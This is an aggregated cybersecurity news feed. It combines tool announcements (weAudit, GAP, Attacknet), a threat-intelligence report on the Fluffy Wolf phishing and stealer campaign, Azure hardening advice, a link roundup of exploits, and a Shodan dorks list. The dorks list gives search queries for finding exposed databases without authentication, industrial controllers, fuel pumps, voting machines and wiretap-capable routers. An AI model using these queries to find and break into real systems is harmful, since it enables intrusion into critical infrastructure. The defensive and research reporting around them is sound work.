Normal view

There are new articles available, click to refresh the page.
Today — 19 March 2024Main stream

Read code like a pro with our weAudit VSCode extension

19 March 2024 at 13:30

By Filipe Casal

Today, we’re releasing weAudit, the collaborative code-reviewing tool that we use during our security audits. With weAudit, we review code more efficiently by taking notes and tracking bugs in a codebase directly inside VSCode, reducing our reliance on external tools, ensuring we never lose track of bugs we find, and enabling us to share that information with teammates.

We designed weAudit with features that are crucial to our auditing process:

  • Bookmarks for findings and notes: Bookmark code regions to identify findings or add audit notes.
  • Tracking of audited files: Mark entire files as reviewed.
  • Collaboration: View and share findings with multiple users.
  • Creation of GitHub issues: Fill in detailed information about a finding and create a preformatted GitHub issue right from weAudit.

You can install it through the VSCode marketplace and find its code in our vscode-weaudit repo.

Why we built weAudit

When we review complex codebases, we often compile detailed notes about both the high-level structure and specific low-level implementation details to share with our project team. For high-level notes, standard document sharing tools more than suffice. But those tools are not ideal for sharing low-level, code-specific notes. For those, we need a tool that allows us to share notes that are more tightly coupled with the codebase itself, almost like using post-it notes to navigate through a complex book. Specifically, we need a tool that allows us to do the following:

  • Quickly navigate through areas of interest in the codebase
  • Visually highlight significant areas of the code
  • Add audit notes to certain parts of the codebase

For some time, I used a very simple extension for VSCode called “Bookmarks”, which allowed me to add basic notes to lines of code. However, I was never satisfied with this extension, as it was missing crucial features:

  • The highlighted code did not display the notes I had written next to the code.
  • I had no way of sharing code coverage information with my client or fellow engineers auditing the codebase.
  • I had no way of sharing my notes and bookmarks. During an audit with a team of engineers, I need to be able to share these things with my team so that my knowledge is their knowledge, and vice versa.

All of us engineers at Trail of Bits agreed that we needed a better tool for this purpose. We realized that if we wanted an extension tailored to our needs, we would need to create it. That is why we built weAudit.

weAudit’s main features

The features we built into weAudit streamline our process of bookmarking, annotating, and tracking code files under audit, sharing our notes, and creating GitHub issues for findings we discover.

Bookmarks

The extension supports two types of bookmarks: findings, which represent buggy or suspicious regions of code, and notes, which represent personal annotations about the code.

You can add findings and notes to the current code snippet selection by running the corresponding VSCode commands or using the keyboard shortcuts:

  • “weAudit: New Finding from Selection” (shortcut: Cmd + J)
  • “weAudit: New Note from Selection” (shortcut: Cmd + K)

These commands will highlight the code in the editor and create a new bookmark in the “List of Findings” view in the sidebar.

By clicking on an item in the “List of Findings” view, you can navigate to the corresponding region of code.

Files with a finding will have a “!” annotation next to the file name in both the file tree of VSCode’s default “Explorer” view and in the tab above the editor, making it immediately clear which files have findings.

The highlight colors can be customized in the extension settings.

Tracking audited files

After reviewing a file, you can mark it as audited by running the “weAudit: Mark File as Reviewed” command or its keyboard shortcut, Cmd + 7. The whole file will be highlighted, and the file name in both the file tree and the tab above the editor will be annotated with a ✓.

The highlight color can be customized in the extension settings.

Daily log

Have you ever had trouble remembering which files you reviewed the previous week? Or do you just really like meaningless statistics such as the number of lines of code you read in a single day? You can see these stats by showing the daily log, accessible from the “List of Findings” panel.

You can also view the daily log by running the “weAudit: Show Daily Log” command in the command palette.

Collaboration with multiple users

You can share weAudit files (located in the .vscode folder) with your co-auditors to share findings and notes about the code. In the “weAudit Files” panel, you can toggle to show or hide the findings from each user by clicking on each entry. The colors for other users’ findings and notes and for your own findings and notes are customizable in the extension settings.

Detailed findings

You can fill in detailed information about a finding by clicking on it in the “List of Findings” view in the sidebar, where you can add all the information we include in our audit reports: title, severity, difficulty, description, exploit scenario, and recommendations for resolving the issue.

This information is then used to prefill a template, allowing you to quickly open a GitHub issue with all of the relevant details for the finding.

You can find more details and information about other features in our README.

Try it out for yourself!

If you use VSCode to navigate through large codebases, we invite you to try weAudit—even if you are not looking for bugs—and let us know what you think!

We welcome any bug reports, feature requests, and contributions in our vscode-weaudit repo.

If you’re interested in VSCode extension security, check out our “Escaping misconfigured VSCode extensions” and “Escaping well-configured VSCode extensions (for profit)” blog posts.

Contact us if you need help securing your VSCode extensions or any other application.

Fluffy Wolf sends out reconciliation reports to sneak into corporate infrastructures

By: BI.ZONE
19 March 2024 at 12:01

The group has adopted a simple yet effective approach to gain initial access: phishing emails with an executable attachment. This way, Fluffy Wolf establishes remote access, steals credentials, or exploits the compromised infrastructure for mining.

The BI.ZONE Threat Intelligence team has detected a previously unknown cluster, dubbed Fluffy Wolf, whose activity can be traced back to 2022. The group uses phishing emails with password-protected archive attachments. The archives contain executable files disguised as reconciliation reports. They are used to deliver various tools to a compromised system, such as Remote Utilities (legitimate software), Meta Stealer, WarZone RAT, or XMRig miner.

Key findings

  1. Phishing emails remain an effective method of intrusion: at least 5% of corporate employees download and open hostile attachments.
  2. Threat actors continue to experiment with legitimate remote access software to enhance their arsenal with new tools.
  3. Malware-as-a-service programs and their cracked versions are expanding the threat landscape in Russia and other CIS countries. They also enable attackers with mediocre technical skills to advance attacks successfully.

The campaign

One of the latest campaigns began with the attackers sending out phishing emails, pretending to be a construction firm (fig. 1). The message titled Reports to sign had an archive with the password included in the file name.

Fig. 1. Phishing email

The archive contained a file Akt_Sverka_1C_Doc_28112023_PDF.com (a reconciliation report) that downloaded and installed Remote Utilities (a remote access tool) and launched Meta Stealer.

When executed, the malicious file performed the following actions:

  • replicated itself in the directory C:\Users\[user]\AppData\Roaming, for example, as Znruogca.exe (specified in the configuration)
  • created a Znruogca registry key with the value equal to the replicated file path, in the registry section HKCU\Software\Microsoft\Windows\CurrentVersion\Run to run the malware after system reboot
  • launched the Remote Utilities loader that delivers the payload from the C2 server
  • started a copy of the active process and injected Meta Stealer’s payload into it

The Remote Utilities installer is an NSIS (Nullsoft Scriptable Install System) that copies program modules to C:\ProgramData\TouchSupport\Bin and runs the Remote Utilities executable—wuapihost.exe.

Remote Utilities is a legitimate remote access tool that enables a threat actor to gain complete control over a compromised device. Thus, they can track the user’s actions, transmit files, run commands, interact with the task scheduler, etc. (fig. 2).

Fig. 2. Remote Utilities official website

Meta Stealer is a clone of the popular RedLine stealer which is frequently used in attacks against organizations in Russia and other CIS countries. Among others, this stealer was employed by the Sticky Wolf cluster.

The stealer can be purchased on underground forums and the official Telegram channel (fig. 3)

Fig. 3. Message in the Telegram channel

A monthly subscription for the malware may cost as little as 150 dollars while a lifetime license can be purchased for 1,000 dollars. It is noteworthy that Meta Stealer is not banned in the CIS countries.

The stealer allows the attackers to retrieve the following information about the system:

  • username
  • screen resolution
  • operating system version
  • operating system language
  • unique identifier (domain name + username + device serial number)
  • time zone
  • CPU (by sending a WMI request SELECT * FROM Win32_Processor)
  • graphics cards (by sending a WMI request SELECT * FROM Win32_VideoController)
  • browsers (by key enumeration in the register hives SOFTWARE\WOW6432Node\Clients\StartMenuInternet and SOFTWARE\Clients\StartMenuInternet)
  • software (by key enumeration in the register hives SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
  • security solutions (by sending WMI requests SELECT * FROM AntivirusProduct, SELECT * FROM AntiSpyWareProduct and SELECT * FROM FirewallProduct)
  • processes running (by sending a WMI request SELECT * FROM Win32_Process Where SessionId='[running process session]')
  • keyboard layouts
  • screenshots

Then it collects and sends the following information to the C2 server:

  • files that match the mask specified in the configuration
  • credentials and cookies from Chromium and Firefox-like browsers (browser paths are specified in the configuration)
  • FileZilla data
  • cryptocurrency wallet data (specified in the configuration)
  • data from the VPN clients installed on the compromised device (NordVPN, ProtonVPN)

We were also able to link this cluster to some previous campaigns that used different sets of tools:

  • a universal loader that spreads the payloads of the Remote Utilities installer and the Meta Stealer
  • an installer with the Meta Stealer payload that downloads Remote Utilities from the C2 server
  • the Remote Utilities installer only, without Meta Stealer
  • WarZone RAT, another malware-as-a-service solution, instead of Remote Utilities
  • a loader for Remote Utilities, Meta Stealer, and WarZone RAT in a single file
  • a miner as an additional tool

Conclusions

The duration and variety of attacks conducted by clusters of activity such as Fluffy Wolf prove their effectiveness. Despite the use of fairly simple tools, the threat actors are able to achieve complex goals. This once again highlights the importance of threat intelligence. Having access to the latest data, companies can promptly detect and eliminate malicious activity at the early stages of the attack cycle.

Indicators of compromise

bussines-a[.]ru
3aaa68af37f9d0ba1bc4b0d505b23f10a994f7cfd9fdf6a5d294c7ef5b4c6a6a
794d27b8f218473d51caa9cfdada493bc260ec8db3b95c43fb1a8ffbf4b4aaf7

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

How to protect your company from such threats

Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

To stay ahead of threat actors, you need to be aware of the methods used in attacks against different infrastructures and to understand the threat landscape. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence platform. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.

GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

By: Zion3R
19 March 2024 at 11:30

This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


TL;DR

Installation

  1. Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
  2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
  3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
  4. Download the GAP.py and requirements.txt from this project and place in the same directory.
  5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
  6. Go to the Extensions -> Installed and click Add under Burp Extensions.
  7. Select Extension type of Python and select the GAP.py file.

Using

  1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

Or you can right click a request or response in any other context and select GAP from the Extensions menu.

  1. Then go to the GAP tab to see the results:

IMPORTANT Notes

If you don't need one of the modes, then un-check it as results will be quicker.

If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.

If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

In Depth Instructions

Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

TODO

  • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
  • Add an option to not add the Tentaive Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
  • Improve performance of the link finding regular expressions.
  • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
  • Deal with other size displays and font sizes better to make sure all controls are viewable.
  • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
  • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

🤘 /XNL-h4ck3r



Identity Providers for RedTeamers

18 March 2024 at 23:01
Originally presented at SOCON-2024, and continuing the series into post-exploitation techniques against Identity Providers, in this blog post we'll look at Ping, OneLogin and Entra ID. I'll discuss how post-exploitation techniques effective against Okta apply to other providers, release new tools for post-exploitation, and look at what proves to be effective when critical assets lie beyond an Identity Provider portal.

Yesterday — 18 March 2024Main stream

Last Week in Security (LWiS) - 2024-03-18

By: Erik
19 March 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-03-11 to 2024-03-18.

News

Techniques and Write-ups

Tools and Exploits

  • BlueSpy - Proof of concept to record and replay audio from a bluetooth device without the legitimate user's awareness.
  • Introducing AzurEnum - The latest Azure tool - Intended to give pentesters/red teamers a good idea of the main security issues of an azure tenant and its permission structure. The code is here.
  • Gungnir - Gungnir is a command-line tool written in Go that continuously monitors certificate transparency (CT) logs for newly issued SSL/TLS certificates.
  • SymProcAddress - Zero EAT touch way to retrieve function addresses (GetProcAddress on steroids)
  • anfs - Asynchronous NFSv3 client in pure Python
  • Pixel_GPU_Exploit - Android 14 kernel exploit for Pixel7/8 Pro.
  • GamingServiceEoP - Exploit for arbitrary folder move in GamingService component of Xbox. GamingService is not default service. If service is installed on system it allows low privilege users to escalate to system.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • Mythic Community Overview - Mythic agent capability matrix. Cool project for those that develop their own agents for Mythic.
  • localsend - An open-source cross-platform alternative to AirDrop
  • FindMeAccess - Finding gaps in Azure/M365 MFA requirements for different resources, client ids, and user agents. The tool is mostly based off Spray365's auditing logic.
  • PurpleLab - PurpleLab is an efficient and readily deployable lab solution, providing a swift setup for cybersecurity professionals to test detection rules, simulate logs, and undertake various security tasks, all accessible through a user-friendly web interface
  • DetectDee - Hunt down social media accounts by username, email or phone across social networks.
  • Moriarty - Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments.
  • Miaow - Project Miaow is a prove of concept to escalate privileges in Microsoft Azure using an ARM template deployment
  • Payload Wizard - AI assistant that utilizes GPT language models to interpret and generate cybersecurity payloads 🪄. Github repo is here.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

5 Best Practices to Secure Azure Resources

18 March 2024 at 14:15

Cloud computing has become the backbone for modern businesses due to its scalability, flexibility and cost-efficiency. As organizations choose cloud service providers to power their technological transformations, they must also properly secure their cloud environments to protect sensitive data, maintain privacy and comply with stringent regulatory requirements. 

Today’s organizations face the complex challenge of outpacing cloud-based threats. Adversaries continue to set their sights on the expansive surface of cloud environments, as evidenced by the 75% increase in cloud intrusions in 2023 recorded in the CrowdStrike 2024 Global Threat Report. This growth in adversary activity highlights the need for organizations to understand how to protect their cloud environment and workloads. 

In light of the frequent breaches of Microsoft’s infrastructure, organizations using Microsoft Azure should take proactive steps to mitigate potential risk. Microsoft’s solutions can be complex, difficult to maintain and configure, and prone to vulnerabilities. It’s the responsibility of organizations using Azure to ensure their cloud environments are properly configured and protected. 

This blog outlines best practices for securing Azure resources to ensure that your cloud infrastructure is fortified against emerging and increasingly sophisticated cyber threats.

Best Practice #1: Require Multifactor Authentication (MFA) and Restrict Access to Source IP Addresses for Both Console and CLI Access

In traditional IT architecture, the security perimeter was clearly defined by the presence of physical network firewalls and endpoint protections, which served as the first line of defense against unauthorized access. In cloud-based environments, this traditional architecture has evolved to include identity, which encompasses user credentials and access management.

This shift amplifies the risk of brute-force attacks or the compromise of user credentials. Particularly in Microsoft environments, the complexity of the identity security framework and inability to consistently apply conditional access policies across the customer estate introduce additional risk. Navigating Microsoft’s security solutions can be daunting, with multiple agents to manage and an array of licenses offering varying levels of protection. The lack of real-time protection and inability to trigger MFA directly through a domain controller further amplify risk. 

Adversaries who manage to procure valid credentials, especially by taking advantage of weak identity security practices, can masquerade as legitimate users. This unauthorized access becomes even more dangerous if the compromised account has elevated privileges. Adversaries can use these accounts to establish persistence and perform data exfiltration, intellectual property theft or other malicious activity that can have devastating impacts on an organization’s operations, reputation and bottom line.

To avoid this, organizations should:

  • Use conditional access: Implement conditional access policies and designate trusted locations.
  • Require MFA: Enforce rules for session times, establish strong password policies and mandate periodic password changes.
  • Monitor MFA connections: Verify that MFA connections originate from a trusted source or IP range. For services that cannot utilize managed identities for Azure resources and must rely on static API keys, a critical best practice is to restrict usage to safe IP addresses when MFA is not an option. However, it’s crucial to understand that broadly trusting IPs from your data centers and offices does not constitute a safe practice. Despite the network location, MFA should always be mandated for all human users to ensure maximum security.

Best Practice #2: Use Caution When Provisioning Elevated Privileges

Privileged accounts have elevated permissions, allowing them to perform tasks or operations that a standard user would not be able to perform. These may include accessing sensitive resources or making critical changes to a system or network. Accounts provisioned with more privileges than needed are appealing to adversaries, driving both the likelihood of compromise and the risk of damage. 

Adversaries often target privileged Azure identities to establish persistence, move laterally and steal data. While high privileges are necessary for IT and systems administrators to accomplish routine tasks, weak security policies on account provisioning can dramatically overexpose an organization to risk. These privileges should be tightly controlled and monitored, and only provisioned when strictly necessary after a security process has been defined and implemented. 

Service accounts add to these challenges. Their limitations represent a troublesome area for Microsoft — for example, the difficulty in discovering and tracking Active Directory-based service accounts and poor visibility into these accounts’ behavior. CrowdStrike automatically differentiates between service accounts and human users to deliver the most appropriate configurations and responses. Further, Microsoft Defender for Identity lacks pre-built detections designed for service accounts — such as identifying stale service accounts or detecting interactive logins by stale accounts — something CrowdStrike customers can easily address. 

To help prevent adversaries’ abuse of privileged accounts, organizations should:

  • Reduce the quantity of privileged users: Only grant privileged role assignments to a limited number of users. Overprovisioning is common and is often done by default by the application.
  • Follow the principle of least privilege: Individuals should only be granted the minimum permissions necessary to perform their required tasks. Regular reviews should be scheduled with a view to downgrading privileges where the need no longer exists.
  • Control access: Restrict cloud access to only trusted IP addresses and services that are genuinely required.
  • Ensure that privileged accounts are cloud-only: Azure privileged accounts should be cloud-only (not synced to a domain), they should require MFA and they should not be used for daily tasks such as email or web browsing.

Best Practice #3: Utilize Key Vaults or a Secrets Management Solution to Store Sensitive Credentials

A surprising amount of digital information is unintentionally stored in public-facing locations that can be accessed by adversaries and then weaponized against an organization. Public code repositories, version control systems or other repositories used by developers can have a high risk of exposing live access keys, which authenticate a trusted user into a cloud service. Exposed access keys allow adversaries to pose as legitimate users and bypass authentication mechanisms into cloud services. 

Adversaries can use access keys, along with metadata and formatting clues, to identify specifics about an environment. Exposed access keys can also be acquired from code snippets, copied from a repository where they are exposed or pulled from compromised systems or logs. Private source code repositories can be compromised, leading to theft of these API keys.

Stolen credentials, whether they’re console usernames and passwords or API key IDs and secret IDs, play an essential role in many incidents. This is evident in the latest Microsoft breach by Russian state actors, which stole cryptographic secrets such as passwords, certificates and authentication keys during the attack. This incident raises a significant concern: If Microsoft, using its own technology and expertise in the environment it owns, struggles to remain secure, how can Microsoft customers confidently protect their own assets? 

To protect against this, security teams should ask themselves:

  • Where do we store access keys?
  • Where are our access keys embedded?
  • How often do we rotate our access keys? 

Having a dedicated secrets management solution to protect and enforce granular access to specific secrets makes it difficult for an adversary or insider threat to steal credentials.

Important note: Proceed with extreme caution when tying administrative or highly privileged access to the key vaults to SSO. If your SSO is subverted through weak MFA management, all of your credentials could be instantly stolen by a threat actor impersonating an existing or new/newly privileged user. Hardware tokens and strong credential reset management is a must for these applications.

Best Practice #4: Don’t Allow Unrestricted Outbound Access to the Internet

One of the most common cloud misconfigurations we see is unrestricted outbound access. This allows for unrestricted communications from internal assets, opening the door for outbound adversary communications and data exfiltration.

Also described as free network egress, unrestricted outbound access is a misconfiguration in which Azure cloud resources like containers, hosts and functions are allowed to communicate externally to any server on the internet with limited controls or oversight. This can be a default misconfiguration, and security teams often have to collaborate with IT or DevOps teams to address it. Because developers or system owners don’t always have full knowledge of the various external services that a workload might depend on — and because they might be accustomed to having unrestricted outbound access in their other work environments — some organizations battle with trying to close this loophole.

Adversaries can exploit this wherever untrusted data is processed by a workload. For example, an adversary may attempt to compromise the underlying software processing web requests, queued messages or uploaded files using remote code execution. This is then followed by payload retrieval or establishing a reverse shell. If outbound access is not permitted, they cannot retrieve the payload and attacks cannot be completed. However, once an initial code execution attack is successful, the adversary has full execution control in the environment.

To address this, organizations can:

  • Configure rules and settings: Define cloud rules to securely control and filter outbound traffic, with provisioned security groups serving as an additional layer of protection.
  • Apply the principle of least privilege: Grant outbound access only to resources or services where it is explicitly required.
  • Control access: Limit cloud access exclusively to trusted IP addresses and services that are genuinely necessary.
  • Add security through a proxy layer: Utilize proxy server tiers to introduce an additional layer of security and depth.

Best Practice #5: Scan Continuously for Shadow IT Resources

It is common for organizations to have IT assets and processes running in Azure tenants that the security teams do not know about. There have been incidents in which threat actors have compromised Azure resources that were unauthorized or were supposed to have been decommissioned. Both nation-state and eCrime adversaries thrive in these environments, where logging and visibility are typically poor and audit/change control is often nonexistent.

Some recommendations to address shadow IT resources include:

  • Implement continuous scanning: Deploy tools and processes to continuously scan for unauthorized or unknown IT resources within Azure environments, ensuring all assets are accounted for and monitored.
  • Establish robust asset management: Adopt a comprehensive cloud asset management solution that can identify, track and manage all IT assets to prevent unauthorized access and use, enhancing overall security posture. This includes Azure enterprise applications and service principals along with their associated privileges and credentials. 
  • Enhance incident response: Strengthen incident response strategies by integrating asset management insights, enabling quick identification and remediation of compromised or rogue assets. These may include unauthorized virtual machines used for activities like crypto mining and enterprise apps and service principals used or repurposed to exfiltrate databases, file shares and internal documentation and email.

CrowdStrike Falcon Cloud Security 

CrowdStrike Falcon® Cloud Security empowers customers to meticulously assess their security posture and compliance across Azure and other cloud platforms, applications and workloads. It delivers effective protection against cloud-based threats, addresses potential misconfigurations and ensures adherence to compliance. These capabilities allow organizations to maintain an integrated, comprehensive overview of all cloud services and their compliance status, pinpointing instances of excessive permissions while proactively detecting and automating the remediation of indicators of attack (IOAs) and cloud misconfigurations. 

This strategic approach not only enhances the security framework but enables developers and security teams to deploy applications in the cloud with increased confidence, speed and efficiency, underscoring CrowdStrike’s commitment to bolstering cloud security and facilitating a safer, more secure digital transformation for businesses leveraging cloud infrastructure.

Evaluate your cloud security posture with a free Cloud Security Risk Review. During the review, you will engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment and identify misconfigurations, vulnerabilities and potential cloud threats. 

Additional Resources

CVE-2024-0860

18 March 2024 at 11:25

CWE-319: CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION

The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests.

Softing edgeConnector: Version 3.60 and Softing edgeAggregator: Version 3.60 are affected. Update Softing edgeConnector and edgeAggregator to v3.70 or greater.

Releasing the Attacknet: A new tool for finding bugs in blockchain nodes using chaos testing

18 March 2024 at 13:00

By Benjamin Samuels (@thebensams)

Today, Trail of Bits is publishing Attacknet, a new tool that addresses the limitations of traditional runtime verification tools, built in collaboration with the Ethereum Foundation. Attacknet is intended to augment the EF’s current test methods by subjecting their execution and consensus clients to some of the most challenging network conditions imaginable.

Blockchain nodes must be held to the highest level of security assurance possible. Historically, the primary tools used to achieve this goal have been exhaustive specification, tests, client diversity, manual audits, and testnets. While these tools have traditionally done their job well, they collectively have serious limitations that can lead to critical bugs manifesting in a production environment, such as the May 2023 finality incident that occurred on Ethereum mainnet. Attacknet addresses these limitations by subjecting devnets to a much wider range of network conditions and misconfigurations than is possible on a conventional testnet.

How Attacknet works

Attacknet uses chaos engineering, a testing methodology that proactively injects faults into a production environment to verify that the system is tolerant to certain failures. These faults reproduce real-world problem scenarios and misconfigurations, and can be used to create exaggerated scenarios to test the boundary conditions of the blockchain.

Attacknet uses Chaos Mesh to inject faults into a devnet environment generated by Kurtosis. By building on top of Kurtosis and Chaos Mesh, Attacknet can create various network topologies with ensembles of different kinds of faults to push a blockchain network to its most extreme edge cases.

Some of the faults include:

  • Clock skew, where a node’s clock is skewed forwards or backwards for a specific duration. Trail of Bits was able to reproduce the Ethereum finality incident using a clock skew fault, as detailed in our TrustX talk last year.
  • Network latency, where a node’s connection to the network (or its corresponding EL/CL client) is delayed by a certain amount of time. This fault can help reproduce global latency conditions or help detect unintentional synchronicity assumptions in the blockchain’s consensus.
  • Network partition, where the network is split into two or more halves that cannot communicate with each other. This fault can test the network’s fork choice rule, ability to re-org, and other edge cases.
  • Network packet drop/corruption, where gossip packets are dropped or have their contents corrupted by a certain amount. This fault can test a node’s gossip validation and test the robustness of the network under hostile network conditions.
  • Forced node crashes/offlining, where a certain client or type of client is ungracefully shut down. This fault can test the network’s resilience to validator inactivity, and test the ability of clients to re-sync to the network.
  • I/O disk faults/latency, where a certain amount of latency or error rate is applied to all I/O operations a node makes. This fault can help profile nodes to understand their resource requirements, as I/O is often the largest limiting factor of node performance.

Once the fault concludes, Attacknet performs a battery of health checks against each node in the network to verify that they were able to recover from the fault. If all nodes recover from the fault, Attacknet moves on to the next configured fault. If one or more nodes fail health checks, Attacknet will generate an artifact of logs and test information to allow debugging.

Future work

In this first release, Attacknet supports two run modes: one with a manually configured network topology and fault parameters, and a “planner mode” where a range of faults are run against a specific client with loosely defined topology parameters. In the future, we plan on adding an “Exploration mode” that will dynamically define fault parameters, inject them, and monitor network health repeatedly, similar to a fuzzer.

Attacknet is currently being used to test the Dencun hard fork, and is being regularly updated to improve coverage, performance, and debugging UX. However, Attacknet is not an Ethereum-specific tool, and was designed to be modular and easily extended to support other types of chains with drastically different designs and topologies. In the future, we plan on extending Attacknet to target other chains, including other types of blockchain systems such as L2s.

If you’re interested in integrating Attacknet with your chain/L2’s testing process, please contact us.

Shodan Dorks

By: Zion3R
18 March 2024 at 11:30


Shodan Dorks by twitter.com/lothos612

Feel free to make suggestions


Shodan Dorks

Basic Shodan Filters

city:

Find devices in a particular city. city:"Bangalore"

country:

Find devices in a particular country. country:"IN"

geo:

Find devices by giving geographical coordinates. geo:"56.913055,118.250862"

Location

country:us country:ru country:de city:chicago

hostname:

Find devices matching the hostname. server: "gws" hostname:"google" hostname:example.com -hostname:subdomain.example.com hostname:example.com,example.org

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

org:microsoft org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"

Product

product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco

Server

server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Web

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Tor / Dark Web sites

onion-location

Databases

MySQL

"product:MySQL" mysql port:"3306"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK" "MongoDB Server Information" port:27017 -authentication

Kibana dashboards without authentication

kibana content-legth:217

elastic

port:9200 json port:"9200" all:elastic port:"9200" all:"elastic indices"

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal. "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

S7

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"
